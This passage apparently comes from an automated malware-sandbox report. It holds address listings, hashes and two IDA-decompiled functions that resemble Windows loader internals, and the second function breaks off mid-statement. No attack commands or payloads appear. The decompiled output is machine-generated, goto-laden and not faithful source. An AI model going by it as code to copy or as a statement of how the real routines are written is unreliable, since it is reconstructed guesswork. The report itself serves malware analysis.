                                          0x011142d6
                                          0x011142d9
                                          0x011142dd
                                          0x011142eb
                                          0x0115e23a
                                          0x011142f1
                                          0x01114305
                                          0x0111430d
                                          0x01114315
                                          0x01114318
                                          0x0111431f
                                          0x01114322
                                          0x0111432e
                                          0x0111433b
                                          0x0111433b
                                          0x00000000
                                          0x0111432e
                                          0x011142eb
                                          0x0111434c
                                          0x0111434e
                                          0x01114352
                                          0x01114359
                                          0x0111435e
                                          0x01114361
                                          0x0111436e
                                          0x0111438a
                                          0x0111438e
                                          0x01114396
                                          0x0111439e
                                          0x011143a1
                                          0x011143ad
                                          0x011143bb
                                          0x011143bb
                                          0x011143ad
                                          0x0111436e
                                          0x011143bf
                                          0x011143c5
                                          0x01114463
                                          0x01114463
                                          0x011143ce
                                          0x011143d5
                                          0x011143d9
                                          0x011143df
                                          0x01114475
                                          0x01114479
                                          0x01114491
                                          0x01114491
                                          0x01114479
                                          0x011143e5
                                          0x011143eb
                                          0x011143f4
                                          0x011143f6
                                          0x011143f9
                                          0x011143fc
                                          0x011143ff
                                          0x011144e8
                                          0x011144ed
                                          0x011144f3
                                          0x0115e247
                                          0x00000000
                                          0x011144f9
                                          0x01114504
                                          0x01114508
                                          0x0111450f
                                          0x0115e269
                                          0x00000000
                                          0x01114515
                                          0x01114519
                                          0x01114531
                                          0x01114534
                                          0x01114537
                                          0x0111453e
                                          0x01114541
                                          0x0111454a
                                          0x0115e255
                                          0x0115e255
                                          0x0115e25b
                                          0x0115e25e
                                          0x0115e261
                                          0x0115e261
                                          0x01114555
                                          0x01114559
                                          0x0111455d
                                          0x0115e26d
                                          0x0115e270
                                          0x0115e274
                                          0x0115e27a
                                          0x0115e27d
                                          0x0115e28e
                                          0x0115e28e
                                          0x01114563
                                          0x01114563
                                          0x01114569
                                          0x01114569
                                          0x00000000
                                          0x0111455d
                                          0x0111450f
                                          0x00000000
                                          0x011144f3
                                          0x011143ff
                                          0x01114405
                                          0x01114405
                                          0x01114405
                                          0x011142ac
                                          0x0111428c
                                          0x01114282
                                          0x01114407
                                          0x0111440d
                                          0x0115e2af
                                          0x0115e2af
                                          0x01114413
                                          0x01114413
                                          0x00000000
                                          0x011141d4
                                          0x00000000
                                          0x011141c3
                                          0x011141bd
                                          0x01114415
                                          0x01114415
                                          0x01114416
                                          0x01114417
                                          0x01114429
                                          0x0111416e
                                          0x0111416e
                                          0x01114175
                                          0x01114498
                                          0x0111449f
                                          0x0115e12d
                                          0x00000000
                                          0x0115e133
                                          0x00000000
                                          0x0115e133
                                          0x011144a5
                                          0x011144a5
                                          0x011144aa
                                          0x00000000
                                          0x011144bb
                                          0x011144ca
                                          0x011144d6
                                          0x011144d7
                                          0x011144d8
                                          0x011144e3
                                          0x011144e3
                                          0x011144aa
                                          0x0111417b
                                          0x0111417b
                                          0x0111417b
                                          0x00000000
                                          0x0111417b
                                          0x01114175
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b048c8d7703ccb675428fc89ffa679114d844fcda8b6826d7adb7ce5d1257588
                                          • Instruction ID: 08033920343da97b479bc80a2ed30e4ccbed26e10c98719f89b0cb6cf0014e6e
                                          • Opcode Fuzzy Hash: b048c8d7703ccb675428fc89ffa679114d844fcda8b6826d7adb7ce5d1257588
                                          • Instruction Fuzzy Hash: 82F17C70A08211CFD76CCF19C480A7AF7E1AF88B54F05492EF996CBA94E734D981CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011220A0 Relevance: .4, Instructions: 420COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E011220A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x11e8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01122EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01122EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E010F58EC(_t240);
									_t221 =  *0x11e5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x11e5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01134A2C(0x11e6e40, 0x1134b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01117D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x10d5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0112F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0112F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01177016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01112400(_t267 + 0x20);
															}
															L01112400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01122397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E01112280(_t134, 0x11e8608);
									__eflags =  *0x11e6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0110FFB0(_t198, _t241, 0x11e8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x11e6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x11e8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01126B90(_t210,  &_v64);
										_t262 =  *0x11e8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0112E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E011397C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0113006A(0x11e8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x11e8608);
												E0113B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x11e6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x11e6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0110FFB0(_t198, _t240, 0x11e8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E011300C2(0x11e8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                          0x011220a0
                                          0x011220a8
                                          0x011220ad
                                          0x011220b3
                                          0x011220b8
                                          0x011220c2
                                          0x011220c7
                                          0x011220cb
                                          0x011220d2
                                          0x01122263
                                          0x01122266
                                          0x01165836
                                          0x01165836
                                          0x00000000
                                          0x0112226c
                                          0x0112226c
                                          0x01122270
                                          0x01122274
                                          0x011220e2
                                          0x011220e2
                                          0x011220e6
                                          0x011220ee
                                          0x011657dc
                                          0x011657de
                                          0x011657ec
                                          0x011657ec
                                          0x011657f1
                                          0x011657f3
                                          0x011657f8
                                          0x00000000
                                          0x011657f8
                                          0x011657e0
                                          0x011657e4
                                          0x011657ea
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011657ea
                                          0x011220f4
                                          0x011220f4
                                          0x011220f8
                                          0x011220f8
                                          0x011220fc
                                          0x01122100
                                          0x01122106
                                          0x01122201
                                          0x01122206
                                          0x0112220b
                                          0x0112220e
                                          0x011222a9
                                          0x011222ac
                                          0x00000000
                                          0x00000000
                                          0x011222b2
                                          0x011222b5
                                          0x01165801
                                          0x01165806
                                          0x00000000
                                          0x00000000
                                          0x01165810
                                          0x01165815
                                          0x01165818
                                          0x00000000
                                          0x00000000
                                          0x0116581e
                                          0x011222bb
                                          0x011222bb
                                          0x01122218
                                          0x01122218
                                          0x0112221c
                                          0x01122220
                                          0x01122222
                                          0x011222c2
                                          0x011222c4
                                          0x011222dc
                                          0x011222dc
                                          0x011222e1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011222e7
                                          0x011222c8
                                          0x011222cd
                                          0x011222d3
                                          0x011222d6
                                          0x01165823
                                          0x01165825
                                          0x01165827
                                          0x00000000
                                          0x00000000
                                          0x0116582d
                                          0x00000000
                                          0x0116582d
                                          0x00000000
                                          0x01122228
                                          0x01122228
                                          0x00000000
                                          0x01122228
                                          0x01122222
                                          0x01122214
                                          0x01122214
                                          0x00000000
                                          0x01122114
                                          0x01122114
                                          0x01122114
                                          0x0112211a
                                          0x0112211c
                                          0x01122348
                                          0x0112234d
                                          0x01165840
                                          0x01165845
                                          0x01165848
                                          0x0116584e
                                          0x0116584e
                                          0x01165848
                                          0x01122353
                                          0x01122355
                                          0x01122388
                                          0x01122388
                                          0x01122368
                                          0x0112236a
                                          0x0112236c
                                          0x0112238f
                                          0x00000000
                                          0x0112236e
                                          0x0112236e
                                          0x0112218e
                                          0x0112218e
                                          0x01122191
                                          0x01122195
                                          0x01165a03
                                          0x01165a06
                                          0x01165a0c
                                          0x01165a0f
                                          0x01165a11
                                          0x01165a13
                                          0x01165a13
                                          0x01165a19
                                          0x01165a1f
                                          0x00000000
                                          0x0112219b
                                          0x0112219b
                                          0x011221a0
                                          0x01122282
                                          0x01122284
                                          0x01122284
                                          0x01122284
                                          0x01122284
                                          0x011221a6
                                          0x011221a9
                                          0x011221ac
                                          0x011221ae
                                          0x011221b3
                                          0x0112228b
                                          0x01122290
                                          0x01122379
                                          0x01122296
                                          0x01122298
                                          0x01122298
                                          0x01122290
                                          0x011221b9
                                          0x011221be
                                          0x011222a2
                                          0x011222a2
                                          0x011221c4
                                          0x011221c8
                                          0x011221cc
                                          0x011221d0
                                          0x011221d4
                                          0x011221de
                                          0x011221e3
                                          0x01165a29
                                          0x01165a2c
                                          0x00000000
                                          0x00000000
                                          0x01165a3b
                                          0x00000000
                                          0x011221e9
                                          0x011221e9
                                          0x011221e9
                                          0x011221ee
                                          0x011221f1
                                          0x01165a45
                                          0x01165a4b
                                          0x01165a52
                                          0x01165a58
                                          0x01165a5d
                                          0x01165a5f
                                          0x01165a71
                                          0x01165a61
                                          0x01165a6a
                                          0x01165a6a
                                          0x01165a76
                                          0x01165a79
                                          0x01165a7f
                                          0x01165a83
                                          0x01165a85
                                          0x01165a87
                                          0x01165a87
                                          0x01165a8c
                                          0x01165a91
                                          0x01165a97
                                          0x01165a9f
                                          0x01165aa0
                                          0x01165aa1
                                          0x01165aa6
                                          0x01165aab
                                          0x01165ab1
                                          0x01165ab3
                                          0x01165ab9
                                          0x01165aca
                                          0x01165ad4
                                          0x01165ad4
                                          0x01165ade
                                          0x01165ade
                                          0x01165aab
                                          0x01165a79
                                          0x01165a52
                                          0x011221f7
                                          0x011221f9
                                          0x011221fe
                                          0x011221fe
                                          0x011221e3
                                          0x01122195
                                          0x0112236c
                                          0x01122122
                                          0x01122122
                                          0x01122124
                                          0x01122231
                                          0x01122236
                                          0x01122236
                                          0x01122238
                                          0x01122238
                                          0x01122240
                                          0x01122242
                                          0x01122244
                                          0x011659fc
                                          0x0112218c
                                          0x0112218c
                                          0x00000000
                                          0x0112218c
                                          0x0112224a
                                          0x0112224f
                                          0x01122256
                                          0x01122304
                                          0x01122309
                                          0x0112230f
                                          0x0112231e
                                          0x0112231e
                                          0x0112231e
                                          0x01122320
                                          0x01122325
                                          0x0112232a
                                          0x0112232c
                                          0x0112233e
                                          0x0112233e
                                          0x00000000
                                          0x0112232c
                                          0x01122311
                                          0x01122317
                                          0x0112231a
                                          0x0112231c
                                          0x01122380
                                          0x01122380
                                          0x01122380
                                          0x01122384
                                          0x00000000
                                          0x00000000
                                          0x01122386
                                          0x00000000
                                          0x0112231c
                                          0x0112225c
                                          0x0112225c
                                          0x00000000
                                          0x0112225c
                                          0x0112212a
                                          0x01122134
                                          0x01122138
                                          0x0112213d
                                          0x01165858
                                          0x01165863
                                          0x01165863
                                          0x01165867
                                          0x0116586a
                                          0x00000000
                                          0x00000000
                                          0x0116586c
                                          0x0116586c
                                          0x01165871
                                          0x01165875
                                          0x01165877
                                          0x01165997
                                          0x0116599c
                                          0x011659a1
                                          0x011659a7
                                          0x011659a7
                                          0x00000000
                                          0x011659a7
                                          0x0116587d
                                          0x00000000
                                          0x0116588b
                                          0x0116588b
                                          0x01165890
                                          0x01165892
                                          0x01165894
                                          0x01165899
                                          0x0116589b
                                          0x011658a0
                                          0x011658a0
                                          0x011658aa
                                          0x011658b2
                                          0x011658b6
                                          0x011658be
                                          0x011658c6
                                          0x011658c9
                                          0x0116590d
                                          0x01165917
                                          0x0116591a
                                          0x0116591c
                                          0x01165920
                                          0x01165928
                                          0x0116592a
                                          0x0116592c
                                          0x0116592e
                                          0x0116592e
                                          0x011658cb
                                          0x011658cd
                                          0x011658d8
                                          0x011658e0
                                          0x011658f4
                                          0x011658fe
                                          0x011658fe
                                          0x0116593a
                                          0x0116593e
                                          0x01165940
                                          0x01165942
                                          0x00000000
                                          0x01165944
                                          0x01165944
                                          0x01165949
                                          0x0116594e
                                          0x0116594e
                                          0x01165953
                                          0x0116595b
                                          0x01165976
                                          0x01165976
                                          0x0116597a
                                          0x0116597f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01165981
                                          0x01165981
                                          0x01165981
                                          0x01165983
                                          0x01165988
                                          0x0116598d
                                          0x01165991
                                          0x01165991
                                          0x00000000
                                          0x0116595d
                                          0x0116595d
                                          0x01165963
                                          0x01165965
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01165967
                                          0x01165967
                                          0x0116596b
                                          0x0116596d
                                          0x00000000
                                          0x00000000
                                          0x0116596f
                                          0x01165971
                                          0x01165971
                                          0x01165974
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01165974
                                          0x00000000
                                          0x01165967
                                          0x0116595b
                                          0x01165942
                                          0x01165863
                                          0x01122143
                                          0x01122143
                                          0x01122149
                                          0x0112214f
                                          0x011222f1
                                          0x011222f6
                                          0x00000000
                                          0x01122173
                                          0x01122173
                                          0x0112217d
                                          0x01122181
                                          0x01122186
                                          0x011659ae
                                          0x011659b2
                                          0x011659b5
                                          0x011659b7
                                          0x011659ba
                                          0x011659cd
                                          0x011659d1
                                          0x011659d5
                                          0x011659d9
                                          0x011659db
                                          0x00000000
                                          0x00000000
                                          0x011659dd
                                          0x011659dd
                                          0x011659e1
                                          0x011659e4
                                          0x011659e7
                                          0x011659ee
                                          0x011659ee
                                          0x011659f3
                                          0x011659f3
                                          0x00000000
                                          0x01122186
                                          0x0112214f
                                          0x01122106
                                          0x01122266
                                          0x011220d8
                                          0x011220da
                                          0x011220e0
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a6463a2ba138d145289e659cd3761acc5b673faec1b1b544ff5b453d9448f5ed
                                          • Instruction ID: 6adf69393d4fdd2e9710b09555a2bc7ca0ef67e098eb10daa8051cababd59d70
                                          • Opcode Fuzzy Hash: a6463a2ba138d145289e659cd3761acc5b673faec1b1b544ff5b453d9448f5ed
                                          • Instruction Fuzzy Hash: 64F137316083118FE72ECF2CC440B6E7BE6BF86364F15852DE9959B281D776D861CB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0110D5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E0110D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x11ed360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E01106600(0x11e52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x11e7b9c; // 0x0
							_t281 = L01114620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0113F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x11e7b90; // 0x77880000
								if(_t384 == 0) {
									_t353 =  *0x11e7b8c; // 0xca2a60
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E01112280(_t200, 0x11e84d8);
									_t277 =  *0x11e85f4; // 0xca2f50
									_t351 =  *0x11e85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xca2ee8
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
